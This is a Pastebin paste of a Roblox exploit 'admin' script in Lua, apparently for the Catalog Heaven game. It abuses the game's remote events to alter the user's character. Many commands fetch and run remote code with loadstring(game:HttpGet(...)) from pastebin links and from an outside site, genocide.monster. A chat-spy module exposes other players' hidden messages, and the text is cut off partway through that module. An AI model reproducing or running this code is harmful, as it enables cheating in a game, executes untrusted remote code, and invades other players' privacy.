Advertisement
Lollddsf

Untitled

Jan 16th, 2020
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.88 KB | None | 0 0
  1. IDFORSPAWNER = IDFORSPAWNER --Change this to one of your own gamepass.
  2. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "SuperFlyGoldBoombox")
  3. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  4. game:GetService("StarterGui"):SetCore("SendNotification", {
  5. Title = "8hxp/Daniel Mesh Admin",
  6. Text = "Thanks go to RIP#6666 for letting me use them",
  7. Icon = "rbxassetid://4529176213"})
  8. game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
  9. if msg:lower() == ".cmds" then
  10. print[[--
  11. -------------------------ADMIN BY YandZ#8406 ------------------------- "PS; Don't be stupid thinking these will work for other people and also don't abuse it"
  12. {I added some extra commands} "Also I have shorten commands"
  13. Enjoy :)
  14. .bhammer --Ban Hammer that swing kills
  15. .bbat --Baseball Bat that swing kills
  16. .dom --dominus that shoots
  17. .ambulance -- wee oo wee oo wee oo {only use it for an emergency}
  18. .ak --Ak-47 that shoots
  19. .badnoob
  20. .ff --forcefield body
  21. .load --makes a loading. .. ... rp name
  22. .head --remove head
  23. .black --makes your character black
  24. .white --makes your character white
  25. .red --makes your character red
  26. .orange --makes your character orange
  27. .green --makes your character green
  28. .blue --makes your character blue
  29. .purple --makes your character purple
  30. .invis --makes your whole body invincible (edit the accessories to yours)
  31. .vis -- makes your character visible
  32. .acp -- ACP car- use R6
  33. .infyl -- INF Yield
  34. .couch --a huge couch
  35. 'cloud --gives cloud
  36. 'stroller --gives stroller
  37. .bigbird --- this don't need a des ur already know by its name
  38. 'noob --makes you a giant noob (r6 reccomended)
  39. 'pm --chat spy
  40. re --reset
  41. 'rj --rejoin
  42. ]]
  43. end
  44. if msg:lower() == ".bigbird" then
  45. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  46. wait()
  47. loadstring(game:HttpGet("https://pastebin.com/raw/wKpufj5P"))()
  48. end
  49. if msg:lower() == ".creepypasta" then
  50. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  51. wait()
  52. loadstring(game:HttpGet("https://pastebin.com/raw/XRUxRUSL"))()
  53. end
  54. game:GetService("UserInputService").JumpRequest:connect(function()
  55. if InfiniteJumpEnabled then
  56. game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
  57. end
  58. end)
  59. if msg:lower() == "'infj" then
  60. InfiniteJumpEnabled = true
  61. end
  62. if msg:lower() == "'uninfj" then
  63. InfiniteJumpEnabled = false
  64. end
  65. if msg:lower() == "'stroller" then
  66. game.Workspace.GiveTool:FireServer("IDFORSPAWNER", "Stroller")
  67. end
  68. if msg:lower() == ".bhammer" then
  69. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  70. wait()
  71. loadstring(game:HttpGet("https://pastebin.com/raw/mm9zbpq2"))()
  72. end
  73. if msg:lower() == ".boombox" then
  74. game.workspace.GiveTool:FireServer("7701149", "SuperFlyGoldBoombox")
  75.  
  76. end
  77. if msg:lower() == ".anchor" then
  78. if game:GetService("Players").LocalPlayer.Character then
  79. for _, part in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  80. pcall(function()
  81. part.Anchored = true
  82. end)
  83. end
  84. end
  85. end
  86. if msg:lower() == "'unanchor" then
  87. if game:GetService("Players").LocalPlayer.Character then
  88. for _, part in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  89. pcall(function()
  90. part.Anchored = false
  91. end)
  92. end
  93. end
  94. end
  95. if msg:lower() == "'rnametag" then
  96. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  97.  
  98.  
  99. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  100. local Name = "Made by King_Daniel3"-- NAME THE TOOL IF WANT
  101. local CE = {} -- DON'T EDIT
  102. local C = { -- DON'T EDIT
  103. workspace = game:GetService("Workspace"),
  104. players = game:GetService("Players")
  105. }
  106. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  107.  
  108.  
  109. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  110. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  111. end
  112.  
  113. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  114.  
  115. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  116. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  117. end
  118. if msg:lower() == "'vis" then
  119. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  120.  
  121.  
  122. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  123. local Name = "NAME"-- NAME THE TOOL IF WANT
  124. local CE = {} -- DON'T EDIT
  125. local C = { -- DON'T EDIT
  126. workspace = game:GetService("Workspace"),
  127. players = game:GetService("Players")
  128. }
  129. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  130.  
  131.  
  132. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  133. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  134. end
  135.  
  136. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  137.  
  138. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  139. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","0")
  140. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","0")
  141. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","0")
  142. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","0")
  143. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","0")
  144. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","0")
  145. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  146. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  147. end
  148. if msg:lower() == "'black" then
  149. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really black"))
  150. end
  151. if msg:lower() == "'white" then
  152. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("White"))
  153. end
  154. if msg:lower() == "'red" then
  155. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really red"))
  156. end
  157. if msg:lower() == "'orange" then
  158. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Deep orange"))
  159. end
  160. if msg:lower() == "'green" then
  161. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Lime green"))
  162. end
  163. if msg:lower() == "'blue" then
  164. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really blue"))
  165. end
  166. if msg:lower() == "'purple" then
  167. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Magenta"))
  168. end
  169. if msg:lower() == "'tan" then
  170. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Nougat"))
  171. end
  172. if msg:lower() == "'invis" then
  173. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  174.  
  175.  
  176. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  177. local Name = "NAME"-- NAME THE TOOL IF WANT
  178. local CE = {} -- DON'T EDIT
  179. local C = { -- DON'T EDIT
  180. workspace = game:GetService("Workspace"),
  181. players = game:GetService("Players")
  182. }
  183. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  184.  
  185.  
  186. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  187. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  188. end
  189.  
  190. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  191.  
  192. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  193. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","1")
  194. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","1")
  195. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","1")
  196. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","1")
  197. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","1")
  198. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","1")
  199. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  200. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  201. end
  202. if msg:lower() == "'torso" then
  203. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  204.  
  205.  
  206. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  207. local Name = "NAME"-- NAME THE TOOL IF WANT
  208. local CE = {} -- DON'T EDIT
  209. local C = { -- DON'T EDIT
  210. workspace = game:GetService("Workspace"),
  211. players = game:GetService("Players")
  212. }
  213. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  214.  
  215.  
  216. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  217. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  218. end
  219.  
  220. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  221.  
  222. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  223. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","1")
  224. end
  225. if msg:lower() == "'arms" then
  226. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  227.  
  228.  
  229. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  230. local Name = "NAME"-- NAME THE TOOL IF WANT
  231. local CE = {} -- DON'T EDIT
  232. local C = { -- DON'T EDIT
  233. workspace = game:GetService("Workspace"),
  234. players = game:GetService("Players")
  235. }
  236. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  237.  
  238.  
  239. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  240. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  241. end
  242.  
  243. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  244.  
  245. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  246. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","1")
  247. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","1")
  248. end
  249. if msg:lower() == "'legs" then
  250. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  251.  
  252.  
  253. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  254. local Name = "NAME"-- NAME THE TOOL IF WANT
  255. local CE = {} -- DON'T EDIT
  256. local C = { -- DON'T EDIT
  257. workspace = game:GetService("Workspace"),
  258. players = game:GetService("Players")
  259. }
  260. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  261.  
  262.  
  263. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  264. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  265. end
  266.  
  267. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  268.  
  269. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  270. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","1")
  271. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","1")
  272. end
  273. if msg:lower() == "'head" then
  274. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  275.  
  276.  
  277. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  278. local Name = "NAME"-- NAME THE TOOL IF WANT
  279. local CE = {} -- DON'T EDIT
  280. local C = { -- DON'T EDIT
  281. workspace = game:GetService("Workspace"),
  282. players = game:GetService("Players")
  283. }
  284. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  285.  
  286.  
  287. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  288. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  289. end
  290.  
  291. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  292.  
  293. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  294. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","1")
  295. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  296. end
  297. if msg:lower() == ".bbat" then
  298. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  299. wait()
  300. loadstring(game:HttpGet("https://pastebin.com/raw/zq4TYFG1"))()
  301. end
  302. if msg:lower() == ".ambulance" then
  303. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  304. wait()
  305. loadstring(game:HttpGet("https://pastebin.com/raw/Zg7dnb5K"))()
  306. end
  307. if msg:lower() == ".badnoob" then
  308. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  309. wait()
  310. loadstring(game:HttpGet("https://pastebin.com/raw/tB0He0HJ"))()
  311. end
  312. if msg:lower() == ".ak" then
  313. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  314. wait()
  315. loadstring(game:HttpGet("https://pastebin.com/raw/EK2yyybY"))()
  316. end
  317. if msg:lower() == "'cool" then
  318. while wait() do
  319. game.Workspace.GuiEvent:FireServer("Speed.")
  320. wait(0.5)
  321. game.Workspace.GuiEvent:FireServer("Speed..")
  322. wait(0.5)
  323. game.Workspace.GuiEvent:FireServer("Speed...")
  324. wait(0.5)
  325. game.Workspace.GuiEvent:FireServer("Speed....")
  326. wait(0.5)
  327. end
  328. end
  329. if msg:lower() == "unknown" then
  330. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  331. local UserName = game:GetService("Players").LocalPlayer.Name
  332. local Autoride = true
  333. local Name, ToolTip = "KTOOL", "Bodymesh"
  334. local CE = {}
  335. local Variables = {
  336. workspace = game:GetService("Workspace"),
  337. players = game:GetService("Players")
  338. }
  339. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  340.  
  341. function CE:FireEvent(ItemName, Object, Property, Value)
  342. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  343. end
  344.  
  345. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  346. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  347.  
  348. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  349.  
  350. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Material",Enum.Material.ForceField)
  351. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Material",Enum.Material.ForceField)
  352. end
  353. if msg:lower() == "unknown" then
  354. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  355. local UserName = game:GetService("Players").LocalPlayer.Name
  356. local Autoride = true
  357. local Name, ToolTip = "KTOOL", "Bodymesh"
  358. local CE = {}
  359. local Variables = {
  360. workspace = game:GetService("Workspace"),
  361. players = game:GetService("Players")
  362. }
  363. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  364.  
  365. function CE:FireEvent(ItemName, Object, Property, Value)
  366. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  367. end
  368.  
  369. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  370. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  371.  
  372. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  373.  
  374. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Material",Enum.Material.ForceField)
  375. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Material",Enum.Material.ForceField)
  376. end
  377. if msg:lower() == "unknown" then
  378. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  379. local UserName = game:GetService("Players").LocalPlayer.Name
  380. local Autoride = true
  381. local Name, ToolTip = "KTOOL", "Bodymesh"
  382. local CE = {}
  383. local Variables = {
  384. workspace = game:GetService("Workspace"),
  385. players = game:GetService("Players")
  386. }
  387. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  388.  
  389. function CE:FireEvent(ItemName, Object, Property, Value)
  390. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  391. end
  392.  
  393. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  394. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  395.  
  396. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  397.  
  398. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Material",Enum.Material.ForceField)
  399. end
  400. if msg:lower() == "unknown" then
  401. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  402. local UserName = game:GetService("Players").LocalPlayer.Name
  403. local Autoride = true
  404. local Name, ToolTip = "KTOOL", "Bodymesh"
  405. local CE = {}
  406. local Variables = {
  407. workspace = game:GetService("Workspace"),
  408. players = game:GetService("Players")
  409. }
  410. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  411.  
  412. function CE:FireEvent(ItemName, Object, Property, Value)
  413. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  414. end
  415.  
  416. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  417. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  418.  
  419. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  420.  
  421. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Material",Enum.Material.ForceField)
  422. end
  423. if msg:lower() == ".ff" then
  424. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  425. local UserName = game:GetService("Players").LocalPlayer.Name
  426. local Autoride = true
  427. local Name, ToolTip = "KTOOL", "Bodymesh"
  428. local CE = {}
  429. local Variables = {
  430. workspace = game:GetService("Workspace"),
  431. players = game:GetService("Players")
  432. }
  433. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  434.  
  435. function CE:FireEvent(ItemName, Object, Property, Value)
  436. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  437. end
  438.  
  439. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  440. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  441.  
  442. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  443.  
  444. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Material",Enum.Material.ForceField)
  445. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Material",Enum.Material.ForceField)
  446. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Material",Enum.Material.ForceField)
  447. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Material",Enum.Material.ForceField)
  448. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Material",Enum.Material.ForceField)
  449. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Material",Enum.Material.ForceField)
  450. end
  451. if msg:lower() == ".viplnvalid" then
  452. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  453. local Name = "NAME"-- NAME THE TOOL IF WANT
  454. local CE = {} -- DON'T EDIT
  455. local C = { -- DON'T EDIT
  456. workspace = game:GetService("Workspace"),
  457. players = game:GetService("Players")
  458. }
  459. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  460.  
  461.  
  462. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  463. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  464. end
  465.  
  466. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  467.  
  468. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  469. while wait() do
  470. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Font","Cartoon")
  471. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","NOTVIP")
  472. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(255,0,0))
  473. wait(.0000000000000000001)
  474. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(75,0,130))
  475. wait(.0000000000000000001)
  476. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(255,165,0))
  477. wait(.0000000000000000001)
  478. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(0,0,255))
  479. wait(.0000000000000000001)
  480. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(0,128,0))
  481. wait(.0000000000000000001)
  482. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(0,128,0))
  483. wait(.0000000000000000001)
  484. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(0,0,255))
  485. wait(.0000000000000000001)
  486. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(255,165,0))
  487. wait(.0000000000000000001)
  488. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(75,0,130))
  489. wait(.0000000000000000001)
  490. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(255,0,0))
  491. wait(.0000000000000000001)
  492. end
  493. end
  494. if msg:lower() == ".acp" then
  495. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  496. wait()
  497. loadstring(game:HttpGet("https://pastebin.com/raw/bHD8YmrD"))()
  498. end
  499. if msg:lower() == ".fat" then
  500. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  501. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  502. local Name = "NAME"-- NAME THE TOOL IF WANT
  503. local CE = {} -- DON'T EDIT
  504. local C = { -- DON'T EDIT
  505. workspace = game:GetService("Workspace"),
  506. players = game:GetService("Players")
  507. }
  508. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  509.  
  510.  
  511. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  512. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  513. end
  514.  
  515. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  516.  
  517. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  518. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Shape","Ball")
  519. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Shape","Block")
  520. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Size",Vector3.new(2,2,2))
  521. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Shape","Ball")
  522. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Shape","Block")
  523. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Size",Vector3.new(2,2,2))
  524. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Shape","Ball")
  525. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Shape","Block")
  526. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Size",Vector3.new(2,2,2))
  527. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Shape","Ball")
  528. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Shape","Block")
  529. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Size",Vector3.new(2,2,2))
  530. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Shape","Badll")
  531. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Shape","Block")
  532. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Size",Vector3.new(2,2,2))
  533. CE:FireEvent("PompousTheCloud",MainUserW["Shirt"],"ShirtTemplate","rbxassetid://249458025")
  534. CE:FireEvent("PompousTheCloud",MainUserW["Pants"],"PantsTemplate","rbxassetid://280452751")
  535. end
  536. if msg:lower() == ".infyl" then
  537. loadstring(game:HttpGet("https://pastebin.com/raw/tzTXmYf2"))()
  538. end
  539. if msg:lower() == "notvalid" then
  540. loadstring(game:HttpGet(('http://genocide.monster/script_source'),true))()
  541. end
  542. if msg:lower() == ".couch" then
  543. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  544. wait()
  545. loadstring(game:HttpGet("https://pastebin.com/raw/MLmdLvaH"))()
  546. end
  547. if msg:lower() == ".cloud" then
  548. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  549. end
  550. if msg:lower() == ".noob" then
  551. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  552. wait()
  553. loadstring(game:HttpGet("https://pastebin.com/raw/aUnrfhmy"))()
  554. end
  555. if msg:lower() == "'pm" then
  556. --This script reveals ALL hidden messages in the default chat
  557. --chat "/spy" to toggle!
  558. enabled = false
  559. --if true will check your messages too
  560. spyOnMyself = true
  561. --if true will chat the logs publicly (fun, risky)
  562. public = false
  563. --if true will use /me to stand out
  564. publicItalics = true
  565. --customize private logs
  566. privateProperties = {
  567. Color = Color3.fromRGB(0,255,255);
  568. Font = Enum.Font.SourceSansBold;
  569. TextSize = 18;
  570. }
  571. --////////////////////////////////////////////////////////////////
  572. local StarterGui = game:GetService("StarterGui")
  573. local Players = game:GetService("Players")
  574. local player = Players.LocalPlayer or Players:GetPropertyChangedSignal("LocalPlayer"):Wait() or Players.LocalPlayer
  575. local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest")
  576. local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering")
  577. local instance = (_G.chatSpyInstance or 0) + 1
  578. _G.chatSpyInstance = instance
  579.  
  580. local function onChatted(p,msg)
  581. if _G.chatSpyInstance == instance then
  582. if p==player and msg:lower():sub(1,4)=="/spy" then
  583. enabled = not enabled
  584. wait(0.3)
  585. privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}"
  586. StarterGui:SetCore("ChatMakeSystemMessage",privateProperties)
  587. elseif enabled and (spyOnMyself==true or p~=player) then
  588. msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ')
  589. local hidden = true
  590. local conn = getmsg.OnClientEvent:Connect(function(packet,channel)
